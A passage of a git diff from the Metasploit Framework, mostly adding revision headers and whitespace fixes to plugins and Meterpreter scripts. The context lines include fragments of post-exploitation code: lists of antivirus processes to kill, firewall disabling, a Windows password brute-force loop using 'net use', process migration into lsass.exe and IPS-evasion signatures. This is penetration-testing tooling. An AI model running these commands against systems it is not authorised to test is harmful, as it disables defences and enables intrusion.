if(not framework.db.active) raise PluginLoadError.new("The database backend has not been initialized") end @@ -49,7 +54,7 @@ class Plugin::DB_Tracer < Msf::Plugin raise PluginLoadError.new("This plugin should not be loaded more than once") end } - + @eh = DBTracerEventHandler.new Rex::Socket::Comm::Local.register_event_handler(@eh) end diff --git a/plugins/db_wmap.rb b/plugins/db_wmap.rb index e2a3466e3d..a7b7275b35 100644 --- a/plugins/db_wmap.rb +++ b/plugins/db_wmap.rb @@ -1,10 +1,15 @@ +# +# $Id$ +# $Revision$ +# + require 'fileutils' require 'msf/ui/console/command_dispatcher/wmap' module Msf ### -# +# # This class intializes the database db with a shiny new # SQLite3 database instance. # @@ -29,17 +34,17 @@ class Plugin::DBWmap < Msf::Plugin def name "Wmap SQLite3 Database" end - + # # The initial command set - # + # def commands { } - end + end end - + # # Wrapper class for the database command dispatcher # @@ -53,22 +58,22 @@ class Plugin::DBWmap < Msf::Plugin # Database specific initialization goes here # ### - + def initialize(framework, opts) super - - #add_console_dispatcher(WmapDatabaseCommandDispatcher) - - add_console_dispatcher(WmapSQLiteCommandDispatcher) - add_console_dispatcher(WmapDatabaseCommandDispatcher) - print_status("=[ WMAP v#{WMAPVersion} - #{WMAPAuthor}") + #add_console_dispatcher(WmapDatabaseCommandDispatcher) + + add_console_dispatcher(WmapSQLiteCommandDispatcher) + add_console_dispatcher(WmapDatabaseCommandDispatcher) + + print_status("=[ WMAP v#{WMAPVersion} - #{WMAPAuthor}") end - + def cleanup remove_console_dispatcher('Wmap SQLite3 Database') - remove_console_dispatcher('Wmap Database Backend') + remove_console_dispatcher('Wmap Database Backend') end # diff --git a/plugins/event_tester.rb b/plugins/event_tester.rb index df02a17521..df8c0beb4a 100644 --- a/plugins/event_tester.rb +++ b/plugins/event_tester.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb index 923b9111f2..7b4035bd46 100644 --- a/plugins/ips_filter.rb +++ b/plugins/ips_filter.rb @@ -1,8 +1,13 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# -# This class hooks all sockets created by a running exploit +# +# This class hooks all sockets created by a running exploit # and prevents data from being sent that matches a known IPS # signature. # @@ -27,9 +32,9 @@ class Plugin::IPSFilter < Msf::Plugin sock.extend(IPSFilter::SocketTracer) sock.context = param.context end - end + end end - + def initialize(framework, opts) super @@ -74,7 +79,7 @@ module SocketTracer r = super(length, opts) if (ips_match(r)) $stderr.puts "*** Incoming read may match a known signature" - end + end return r end @@ -85,7 +90,7 @@ module SocketTracer def ips_match(data) lp = localport rp = peerport - + SIGS.each do |s| begin r = Regexp.new(s[1]) @@ -97,18 +102,18 @@ module SocketTracer $stderr.puts "*** Compiled error: #{s[1]}" end end - + return false end - + # Extend this as needed :-) - SIGS = + SIGS = [ ['DCOM.C', ".*\\\x5c\x00\\\x5c\x00\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00.*\xcc\xe0\xfd\x7f.*"], ['BLASTER', ".*\\\x5c\x00\\\x5c\x00\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00.*\xcc\xe0\xfd\x7f.*"], ['REMACT', ".*\xb8\x4a\x9f\x4d\x1c\\}\xcf\x11\x86\x1e\x00\x20\xaf\x6e.*"], ['x86 NOP SLED', "\x90\x90"], - ] + ] end end diff --git a/plugins/msfd.rb b/plugins/msfd.rb index 89b611ca4c..3eadba8cdc 100644 --- a/plugins/msfd.rb +++ b/plugins/msfd.rb @@ -1,11 +1,15 @@ #!/usr/bin/env ruby # +# $Id$ +# # This plugin provides an msf daemon interface that spawns a listener on a # defined port (default 55554) and gives each connecting client its own # console interface. These consoles all share the same framework instance. # Be aware that the console instance that spawns on the port is entirely # unauthenticated, so realize that you have been warned. # +# $Revision$ +# module Msf diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index e1d5c5b2ad..2482686b54 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This plugin provides integration with Rapid7 NeXpose # +# $Revision$ +# require 'rapid7/nexpose' diff --git a/plugins/pcap_log.rb b/plugins/pcap_log.rb index 5c08cc5093..00a094b8ef 100644 --- a/plugins/pcap_log.rb +++ b/plugins/pcap_log.rb @@ -3,28 +3,30 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## +# $Revision$ + require 'packetfu' module Msf class Plugin::PcapLog < Msf::Plugin include PacketFu - + def no_pcaprub_error - print_error(" -- PcapRub is not installed -- ") + print_error(" -- PcapRub is not installed -- ") print_error("Make sure you have libpcap-dev and try the following commands") print_error("to install it:") print_error("\t$ cd external/pcaprub/") print_error("\t$ ruby extconf.rb && make && sudo make install") end def usage - print_error("No interface given") + print_error("No interface given") print ("usage: load #{self.name} iface= [path=] [prefix=] [filter=\"\"]\n") end @@ -35,14 +37,14 @@ class Plugin::PcapLog < Msf::Plugin iface = opts['iface'] || nil filter = opts['filter'] - begin + begin require 'pcaprub' rescue LoadError self.no_pcaprub_error raise end - if (iface.nil?) + if (iface.nil?) self.usage raise RuntimeError.new("No interface specified") end @@ -61,7 +63,7 @@ class Plugin::PcapLog < Msf::Plugin begin while true while (this_pkt = stream.next) - if this_pkt + if this_pkt PacketFu::Write.append(:file => @capture_file, :pkt => this_pkt) else print_status("No packets") diff --git a/plugins/sample.rb b/plugins/sample.rb index 0d69dc675c..7f697507a9 100644 --- a/plugins/sample.rb +++ b/plugins/sample.rb @@ -1,12 +1,17 @@ +# +# $Id$ +# + module Msf ### -# +# # This class illustrates a sample plugin. Plugins can change the behavior of # the framework by adding new features, new user interface commands, or # through any other arbitrary means. They are designed to have a very loose # definition in order to make them as useful as possible. # +# $Revision$ ### class Plugin::Sample < Msf::Plugin @@ -38,7 +43,7 @@ class Plugin::Sample < Msf::Plugin # This method handles the sample command. # def cmd_sample(*args) - print_line("You passed: #{args.join(' ')}") + print_line("You passed: #{args.join(' ')}") end end @@ -68,7 +73,7 @@ class Plugin::Sample < Msf::Plugin def cleanup # If we had previously registered a console dispatcher with the console, # deregister it now. - remove_console_dispatcher('Sample') + remove_console_dispatcher('Sample') end # diff --git a/plugins/session_tagger.rb b/plugins/session_tagger.rb index 2cf096c4f5..9d22439bd5 100644 --- a/plugins/session_tagger.rb +++ b/plugins/session_tagger.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### diff --git a/plugins/socket_logger.rb b/plugins/socket_logger.rb index 384ad33561..277aae5b2e 100644 --- a/plugins/socket_logger.rb +++ b/plugins/socket_logger.rb @@ -1,8 +1,13 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# -# This class hooks all sockets created by a running exploit +# +# This class hooks all sockets created by a running exploit # ### @@ -15,7 +20,7 @@ class Plugin::SocketLogger < Msf::Plugin ### class MySocketEventHandler include Rex::Socket::Comm::Events - + def initialize(path, prefix) @path = path @prefix = prefix @@ -31,16 +36,16 @@ class Plugin::SocketLogger < Msf::Plugin sock.context = param.context sock.params = param sock.initlog(@path, @prefix) - + end - end + end end - + def initialize(framework, opts) log_path = opts['path'] || "/tmp" log_prefix = opts['prefix'] || "socket_" - + super @eh = MySocketEventHandler.new(log_path, log_prefix) Rex::Socket::Comm::Local.register_event_handler(@eh) @@ -68,7 +73,7 @@ module SocketLogger module SocketTracer @@last_id = 0 - + attr_accessor :context, :params # Hook the write method @@ -81,7 +86,7 @@ module SocketTracer # Hook the read method def read(length = nil, opts = {}) r = super(length, opts) - + @fd.puts "READ (#{r.length} bytes)" @fd.puts Rex::Text.to_hex_dump(r) return r @@ -91,7 +96,7 @@ module SocketTracer super(*args) @fd.close end - + def initlog(path, prefix) @log_path = path @log_prefix = prefix diff --git a/plugins/sounds.rb b/plugins/sounds.rb index 68b78a5dff..53a7c99c32 100644 --- a/plugins/sounds.rb +++ b/plugins/sounds.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### diff --git a/plugins/thread.rb b/plugins/thread.rb index 1c504d165c..abf329a89e 100644 --- a/plugins/thread.rb +++ b/plugins/thread.rb @@ -1,7 +1,12 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# +# # This class illustrates a sample plugin. Plugins can change the behavior of # the framework by adding new features, new user interface commands, or # through any other arbitrary means. They are designed to have a very loose @@ -41,7 +46,7 @@ class Plugin::ThreadTest < Msf::Plugin print_line("Test thread is already running") return end - + @mythread = ::Thread.new { while(true) print_line("--- test thread ---") @@ -50,24 +55,24 @@ class Plugin::ThreadTest < Msf::Plugin } print_line("Test thread created") end - + def cmd_stop_thread(*args) if (! @mythread) print_line("No test thread is running") return end - + @mythread.kill @mythread = nil print_line("Test thread stopped") end - + def cmd_list_thread(*args) Thread.list.each do |t| print_line(sprintf("Thread: 0x%.8x (%s/%d) (%s)", t.object_id, t.status, t.priority, t.tsource)) print_line("") end - end + end end # @@ -108,7 +113,7 @@ class Plugin::ThreadTest < Msf::Plugin def cleanup # If we had previously registered a console dispatcher with the console, # deregister it now. - remove_console_dispatcher('ThreadTest') + remove_console_dispatcher('ThreadTest') end # diff --git a/plugins/token_hunter.rb b/plugins/token_hunter.rb index 623e579122..0bf1722b3a 100644 --- a/plugins/token_hunter.rb +++ b/plugins/token_hunter.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf class Plugin::TokenHunter < Msf::Plugin diff --git a/plugins/xmlrpc.rb b/plugins/xmlrpc.rb index 6b825dd6b5..131a530bea 100644 --- a/plugins/xmlrpc.rb +++ b/plugins/xmlrpc.rb @@ -1,11 +1,15 @@ #!/usr/bin/env ruby # +# $Id$ +# # This plugin provides an msf daemon interface that spawns a listener on a # defined port (default 55553) and gives each connecting client its own # console interface. These consoles all share the same framework instance. # Be aware that the console instance that spawns on the port is entirely # unauthenticated, so realize that you have been warned. # +# $Revision$ +# require "msf/core/rpc" require "fileutils" @@ -36,18 +40,18 @@ class Plugin::XMLRPC < Msf::Plugin # def initialize(framework, opts) super - + host = opts['ServerHost'] || DefaultHost port = opts['ServerPort'] || DefaultPort ssl = (opts['SSL'] and opts['SSL'].to_s =~ /^[ty]/i) ? true : false cert = opts['SSLCert'] ckey = opts['SSLKey'] - + user = opts['User'] || "msf" pass = opts['Pass'] || ::Rex::Text.rand_text_alphanumeric(8) type = opts['ServerType'] || "Basic" uri = opts['URI'] || "/RPC2" - + print_status(" XMLRPC Service: #{host}:#{port} #{ssl ? " (SSL)" : ""}") print_status("XMLRPC Username: #{user}") print_status("XMLRPC Password: #{pass}") @@ -88,43 +92,43 @@ class Plugin::XMLRPC < Msf::Plugin # # The meat of the plugin, sets up handlers for requests - # + # def run - + # Initialize the list of authenticated sessions @tokens = {} - + args = [framework,@tokens,@users] - + # Add handlers for every class - self.server.add_handler(::XMLRPC::iPIMethods("auth"), + self.server.add_handler(::XMLRPC::iPIMethods("auth"), ::Msf::RPC::Auth.new(*args) ) - - self.server.add_handler(::XMLRPC::iPIMethods("core"), + + self.server.add_handler(::XMLRPC::iPIMethods("core"), ::Msf::RPC::Core.new(*args) ) - + self.server.add_handler(::XMLRPC::iPIMethods("session"), ::Msf::RPC::Session.new(*args) ) - + self.server.add_handler(::XMLRPC::iPIMethods("job"), ::Msf::RPC::Job.new(*args) ) - + self.server.add_handler(::XMLRPC::iPIMethods("module"), ::Msf::RPC::Module.new(*args) ) - - # Set the default/catch-all handler + + # Set the default/catch-all handler self.server.set_default_handler do |name, *args| raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!") end - + # Start the actual service self.server.start - + # Wait for the service to complete self.server.wait end diff --git a/scripts/meterpreter/checkvm.rb b/scripts/meterpreter/checkvm.rb index 9f5461e8d9..c92cf0cae0 100644 --- a/scripts/meterpreter/checkvm.rb +++ b/scripts/meterpreter/checkvm.rb @@ -53,7 +53,7 @@ def hypervchk(session) end rescue end - end + end return vm end @@ -98,7 +98,7 @@ def vmwarechk(session) session.sys.process.get_processes().each do |x| if p == (x['name'].downcase) print_status("This is a VMware Virtual Machine") if not vm - vm = true + vm = true end end end @@ -312,7 +312,7 @@ end print_status("Checking if target is a Virtual Machine .....") found = hypervchk(session) -found = vmwarechk(session) if not found +found = vmwarechk(session) if not found found = checkvrtlpc(session) if not found found = vboxchk(session) if not found found = xenchk(session) if not found diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb index 376331aeef..f965973aab 100644 --- a/scripts/meterpreter/getcountermeasure.rb +++ b/scripts/meterpreter/getcountermeasure.rb @@ -1,7 +1,7 @@ # $Id$ # # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. -# Provides also the option to kill the processes of detected products and disable the built-in firewall. +# Provides also the option to kill the processes of detected products and disable the built-in firewall. # Provided by Carlos Perez at carlos_perez[at]darkoperator.com # Version: 0.1.0 session = client @@ -20,7 +20,7 @@ def usage end #------------------------------------------------------------------------------- -avs = %W{ +avs = %W{ a2adguard.exe a2adwizard.exe a2antidialer.exe @@ -34,9 +34,9 @@ avs = %W{ a2start.exe a2sys.exe a2upd.exe - aavgapi.exe + aavgapi.exe aawservice.exe - aawtray.exe + aawtray.exe ad-aware.exe ad-watch.exe alescan.exe @@ -109,10 +109,10 @@ avs = %W{ defensewall.exe defensewall_serv.exe defwatch.exe - f-agnt95.exe + f-agnt95.exe fpavupdm.exe - f-prot95.exe - f-prot.exe + f-prot95.exe + f-prot.exe fprot.exe fsaua.exe fsav32.exe @@ -121,7 +121,7 @@ avs = %W{ fsm32.exe fsma32.exe fssm32.exe - f-stopw.exe + f-stopw.exe f-stopw.exe fwservice.exe fwsrv.exe @@ -131,7 +131,7 @@ avs = %W{ icmon.exe idsinst.exe idslu.exe - inetupd.exe + inetupd.exe irsetup.exe isafe.exe isignup.exe @@ -244,7 +244,7 @@ avs = %W{ vsaccess.exe vsserv.exe wcantispy.exe - win-bugsfix.exe + win-bugsfix.exe winpatrol.exe winpatrolex.exe wrsssdk.exe @@ -276,7 +276,7 @@ def checklocalfw(session,killfw) opmode = "" r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true}) while(d = r.channel.read) - opmode << d + opmode << d end r.channel.close r.close @@ -311,7 +311,7 @@ def checkdep(session) r.close r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) - tmpout << d + tmpout << d end r.channel.close r.close @@ -325,7 +325,7 @@ def checkdep(session) print_status("\tDEP is limited to Windows system binaries.") elsif depmode.to_s == "3" print_status("\tDEP is on for all programs and services.") - end + end end #------------------------------------------------------------------------------- diff --git a/scripts/meterpreter/getgui.rb b/scripts/meterpreter/getgui.rb index f1f8498c6b..58d7a2dd6f 100644 --- a/scripts/meterpreter/getgui.rb +++ b/scripts/meterpreter/getgui.rb @@ -53,7 +53,7 @@ def enablerd(session) open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) v = open_key.query_value(value) print_status "Enabling Remote Desktop" - if v.data == 1 + if v.data == 1 print_status "\tRDP is disabled; enabling it ..." open_key = session.sys.registry.open_key(root_key, base_key, KEY_WRITE) open_key.set_value(value, session.sys.registry.type2str("REG_DWORD"), 0) @@ -63,7 +63,7 @@ def enablerd(session) rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end - + end diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb index b8beed594f..01f4fb2a5c 100644 --- a/scripts/meterpreter/gettelnet.rb +++ b/scripts/meterpreter/gettelnet.rb @@ -23,7 +23,7 @@ def checkifinst(session) if d =~ (/TlntSvr/) return true end - + end r.channel.close r.close @@ -32,7 +32,7 @@ end #--------------------------------------------------------------------------------------------------------- def insttlntsrv(session) trgtos = session.sys.config.sysinfo - if trgtos =~ /(Windows Vista)/ + if trgtos =~ /(Windows Vista)/ if checkifinst(session) print_status("Telnet Service Installed on Target") else diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb index 6916c3232d..25167422a0 100644 --- a/scripts/meterpreter/hostsedit.rb +++ b/scripts/meterpreter/hostsedit.rb @@ -1,6 +1,6 @@ # $Id$ # Meterpreter script for modifying the hosts file in windows -# given a single entrie or several in a file and clear the +# given a single entrie or several in a file and clear the # DNS cache on the target machine. # This script works with Windows 2000,Windows XP,Windows 2003, # Windows Vista and Windows 2008. @@ -75,7 +75,7 @@ end backuphosts(session,hosts) add2hosts(session,val,hosts) cleardnscach(session) - when "-l" + when "-l" checkuac(session) if not ::File.exists?(val) raise "File #{val} does not exists!" diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb index 6b73dd646a..85fccecafe 100644 --- a/scripts/meterpreter/killav.rb +++ b/scripts/meterpreter/killav.rb @@ -22,7 +22,7 @@ end print_status("Killing Antivirus services on the target...") avs = %W{ - AAWTray.exe + AAWTray.exe Ad-Aware.exe MSASCui.exe _avp32.exe @@ -74,7 +74,7 @@ avs = %W{ avltmain.exe avnt.exe avp.exe - avp.exe + avp.exe avp32.exe avpcc.exe avpdos32.exe diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb index f1c1da3503..8319b0c6d3 100644 --- a/scripts/meterpreter/migrate.rb +++ b/scripts/meterpreter/migrate.rb @@ -1,6 +1,6 @@ # $Id$ # -# Simple example script that migrates to a specific process by name. +# Simple example script that migrates to a specific process by name. # This is meant as an illustration. # @@ -39,7 +39,7 @@ if ! spawn # Get the target process name target ||= "lsass.exe" print_status("Migrating to #{target}...") - + # Get the target process pid target_pid = client.sys.process[target] diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb index 6e68fef6cc..25bcc0eb52 100644 --- a/scripts/meterpreter/multi_console_command.rb +++ b/scripts/meterpreter/multi_console_command.rb @@ -1,9 +1,14 @@ -# $Id:$ -#Meterpreter script for running multiple console commands on a meterpreter session -#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com -#Verion: 0.1 +# $Id$ +# +# Meterpreter script for running multiple console commands on a meterpreter session +# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com +# Verion: 0.1 +# +# $Revision$ + ################## Variable Declarations ################## session = client + # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ], diff --git a/scripts/meterpreter/multicommand.rb b/scripts/meterpreter/multicommand.rb index c966bc0ad1..7cf282ed3c 100644 --- a/scripts/meterpreter/multicommand.rb +++ b/scripts/meterpreter/multicommand.rb @@ -86,7 +86,7 @@ end } -if args.length == 0 or help == 1 +if args.length == 0 or help == 1 usage elsif outfile == nil list_exec(session,commands).each_line do |l| diff --git a/scripts/meterpreter/multiscript.rb b/scripts/meterpreter/multiscript.rb index d8d88e6675..69435e5b4e 100644 --- a/scripts/meterpreter/multiscript.rb +++ b/scripts/meterpreter/multiscript.rb @@ -4,7 +4,7 @@ #Verion: 0.2 ################## Variable Declarations ################## session = client -# Setting Argument +# Setting Argument @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ], @@ -59,7 +59,7 @@ end end end -if args.length == 0 or help == 1 +if args.length == 0 or help == 1 usage else print_status("Running Multiscript script.....") diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb index d82c596818..55ff7f0a9e 100644 --- a/scripts/meterpreter/netenum.rb +++ b/scripts/meterpreter/netenum.rb @@ -152,7 +152,7 @@ def frwdlp(session,hostlst,domain,dest) break end end - + r.channel.close r.close } @@ -249,7 +249,7 @@ def srvreclkp(session,domain,dest) srout.clear end end - + end #------------------------------------------------------------------------------- #Function to print message during run diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb index 2a3c4b6308..0f243fb7a9 100644 --- a/scripts/meterpreter/prefetchtool.rb +++ b/scripts/meterpreter/prefetchtool.rb @@ -1,7 +1,7 @@ # $Id$ #Meterpreter script for extracting information from windows prefetch folder #Provided by Milo at keith.lee2012[at]gmail.com -#Verion: 0.1.0 +#Verion: 0.1.0 require 'fileutils' require 'net/http' @@ -13,9 +13,9 @@ require 'digest/sha1' # Script Options @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu."], - "-p" => [ false, "List Installed Programs"], - "-c" => [ false, "Disable SHA1/MD5 checksum"], - "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], + "-p" => [ false, "List Installed Programs"], + "-c" => [ false, "Disable SHA1/MD5 checksum"], + "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], "-i" => [ false, "Perform lookup for software name"], "-l" => [ false, "Download Prefetch Folder Analysis Log"] ) @@ -27,7 +27,7 @@ def read_program_list key = @session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ) sfmsvals = key.enum_key sfmsvals.each do |test1| - begin + begin key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1 root_key2, base_key2 = @session.sys.registry.splitkey(key2) value1 = "DisplayName" @@ -36,7 +36,7 @@ def read_program_list v1 = open_key.query_value(value1) v2 = open_key.query_value(value2) print_status("#{v1.data}\t(Version: #{v2.data})") - rescue + rescue end end end @@ -46,7 +46,7 @@ def prefetch_dump(options, logging=false) lexe = File.join(Msf::Config.data_directory, "prefetch.exe") rexe = sprintf("%.5d",rand(100000)) + ".exe" rlog = sprintf("%.5d",rand(100000)) + ".txt" - + print_status("Uploading Prefetch-tool for analyzing Prefetch folder...") begin @session.fs.file.upload_file("#{@tempdir}\\#{rexe}", lexe) @@ -58,11 +58,11 @@ def prefetch_dump(options, logging=false) end begin - + if(logging) options += " --txt=#{@tempdir}\\#{rlog}" end - + r = @session.sys.process.execute("cmd.exe /c #{@tempdir}\\#{rexe} #{options} #{rlog}", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) d.split("\n").each do |out| @@ -81,7 +81,7 @@ def prefetch_dump(options, logging=false) end sleep(0.5) if found end - + r.channel.close r.close @@ -99,7 +99,7 @@ def prefetch_dump(options, logging=false) @session.sys.process.execute("cmd.exe /c del #{@tempdir}\\#{rlog}", nil, {'Hidden' => 'true'}) end - rescue ::Interrupt; raise $! + rescue ::Interrupt; raise $! rescue ::Exception => e print_status("The following error was encountered: #{e.class} #{e}") return @@ -148,7 +148,7 @@ if !(::File.exist?(prefetch_local)) else print_status("Checking for an updated copy of prefetch.exe..") digest = Digest::SHA1.hexdigest(::File.read(prefetch_local, ::File.size(prefetch_local))) - + Net::HTTP.start("code.google.com") do |http| req = Net::HTTP::Get.new("/p/prefetch-tool/downloads/detail?name=prefetch.exe&can=2&q=") resp = http.request(req) diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb index 8904fe779b..e045675071 100644 --- a/scripts/meterpreter/remotewinenum.rb +++ b/scripts/meterpreter/remotewinenum.rb @@ -4,7 +4,7 @@ # and Windows XP remote targets using native windows command wmic. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com #Verion: 0.1.0 -#Note: +#Note: ################## Variable Declarations ################## session = client # Variables for Options @@ -65,7 +65,7 @@ def wmicexec(session,wmic,user,pass,trgt) tmp = session.fs.file.expand_path("%TEMP%") # Temporary file on windows host to store results wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" - + wmic.each do |wmi| if user == nil print_status("The commands will be ran under the credentials of #{runningas}") @@ -132,7 +132,7 @@ def headerbuid(session,target,dest) header << "OS: #{info['OS']}\n" header << "Target: #{target}\n" header << "\n\n\n" - + print_status("Saving report to #{dest}") header @@ -187,10 +187,10 @@ if helpcall == 0 and trg != "" print_status("Stopped: Running as System and no user provided for connecting to target!!") else trg != nil && helpcall != 1 - + filewrt(dest,headerbuid(session,trg,dest)) filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg)) - + end elsif helpcall == 0 and trg == "" diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index 0748ba99b8..2ea398e4ef 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -26,7 +26,7 @@ def usage print_line "USAGE: run search_dwld [base directory] [filter] [pattern]" print_line print_line "filter can be a defined pattern or 'free', in which case pattern must be given" - print_line "Defined patterns:" + print_line "Defined patterns:" print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n") print_line print_line "Examples:" @@ -75,13 +75,13 @@ if filter == 'free' end $motif = args[2] else - $motif = $filters[filter] + $motif = $filters[filter] end if $motif.nil? raise RuntimeError.new("Unrecognized filter") end -# Search and download +# Search and download scan(basedir) diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb index a4b06aa87d..d4e21d271d 100644 --- a/scripts/meterpreter/winbf.rb +++ b/scripts/meterpreter/winbf.rb @@ -65,7 +65,7 @@ def chkpolicy(session) end #-------------------------------------------------------- -# Function for brute forcing passwords using windows native tools +# Function for brute forcing passwords using windows native tools def passbf(session,passlist,target,user,opt,logfile) print_status("Running Brute force attack against #{user}") print_status("Successfull Username and Password pairs are being saved in #{logfile}") @@ -88,7 +88,7 @@ def passbf(session,passlist,target,user,opt,logfile) ::File.open(passlist, "r").each_line do |line| begin print_status("Trying #{u.chomp} #{line.chomp}") - + # Command for testing local login credentials r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) @@ -96,7 +96,7 @@ def passbf(session,passlist,target,user,opt,logfile) end r.channel.close r.close - + # Checks if password is found result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) if result.length == 1 @@ -144,10 +144,10 @@ def logme(target) # Create the log directory ::FileUtils.mkdir_p(logs) - + #logfile name dest = logs + "/" + target + filenameinfo - + dest end #-------------------------------------------------------- @@ -162,16 +162,16 @@ end when "-L" userlist = val ulopt = 1 - + when "-cp" chkpolicy(session) exit when "-p" - + passlist = val if not ::File.exists?(passlist) raise "Password File does not exists!" - end + end when "-t" target = val when "-h" @@ -189,11 +189,11 @@ end if user.length > 0 && passlist != nil && target != nil passbf(session,passlist,target,user,ulopt,logme(target)) - + elsif userlist != nil && passlist != nil && target != nil passbf(session,passlist,target,userlist,ulopt,logme(target)) - + elsif helpcall == 0 print( @@ -201,5 +201,5 @@ elsif helpcall == 0 "Usage:\n" + @@exec_opts.usage ) -end +end diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index 48fe1b7e40..f5000c2b39 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -265,14 +265,14 @@ def list_exec(cmdlst) r.close }) i += 1 - + else sleep(0.10) and a.delete_if {|x| not x.alive?} while not a.empty? i = 0 end end - + a.delete_if {|x| not x.alive?} while not a.empty? end #------------------------------------------------------------------------------- @@ -293,7 +293,7 @@ def wmicexec(wmiccmds= nil) print_status "\trunning command wmic #{wmi}" flname = "#{@logfol}/wmic_#{wmi.gsub(/(\W)/,"_")}.csv" r = @client.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi} /format:csv", nil, {'Hidden' => true}) - sleep(2) + sleep(2) #Making sure that WMIC finishes before executing next WMIC command prog2check = "wmic.exe" found = 0 diff --git a/test/tests/03_range_walker_test.rb b/test/tests/03_range_walker_test.rb index 6879203443..5ffb29042a 100644 --- a/test/tests/03_range_walker_test.rb +++ b/test/tests/03_range_walker_test.rb @@ -5,13 +5,13 @@ require 'rex/socket/range_walker' describe Rex::Socket::RangeWalker do it "should have a num_ips attribute" do - walker = Rex::Socket::RangeWalker.new("") + walker = Rex::Socket::RangeWalker.new("") walker.should respond_to("num_ips") walker.should respond_to("length") walker.num_ips.should == walker.length end it "should handle single ipv6 addresses" do - walker = Rex::Socket::RangeWalker.new("::1") + walker = Rex::Socket::RangeWalker.new("::1") walker.should be_valid walker.length.should == 1 end @@ -102,20 +102,20 @@ describe Rex::Socket::RangeWalker do end it "should handle ipv6 cidr" do - walker = Rex::Socket::RangeWalker.new("::1/127") + walker = Rex::Socket::RangeWalker.new("::1/127") walker.should be_valid walker.length.should == 2 - walker = Rex::Socket::RangeWalker.new("::1/122") + walker = Rex::Socket::RangeWalker.new("::1/122") walker.should be_valid walker.length.should == 2 ** 6 - walker = Rex::Socket::RangeWalker.new("::1/116") + walker = Rex::Socket::RangeWalker.new("::1/116") walker.should be_valid walker.length.should == 2 ** 12 end #it "should handle ipv6 ranges" do # pending("Need to define how this should be handled") - # walker = Rex::Socket::RangeWalker.new("::1-::1:1") + # walker = Rex::Socket::RangeWalker.new("::1-::1:1") # walker.should be_valid # walker.length.should == 2 ** 16 #end diff --git a/tools/convert_31.rb b/tools/convert_31.rb index ff96cca9d0..8acac41a00 100755 --- a/tools/convert_31.rb +++ b/tools/convert_31.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# path = ARGV.shift || exit data = File.read(path) @@ -18,18 +22,18 @@ data.each_line do |line| line = "#{spaces}include Msf::#{inc.strip}\n" end end - + if(line =~ /^(\s*)class ([^\<]+)\s*<\s*(.*)/) prefix = "" spaces = $1 parent = $3 - + if(parent !~ /^Msf/) prefix = "Msf::" end line = "#{spaces}class Metasploit3 < #{prefix}#{parent.strip}\n" end - + outp += line end diff --git a/tools/exe2vba.rb 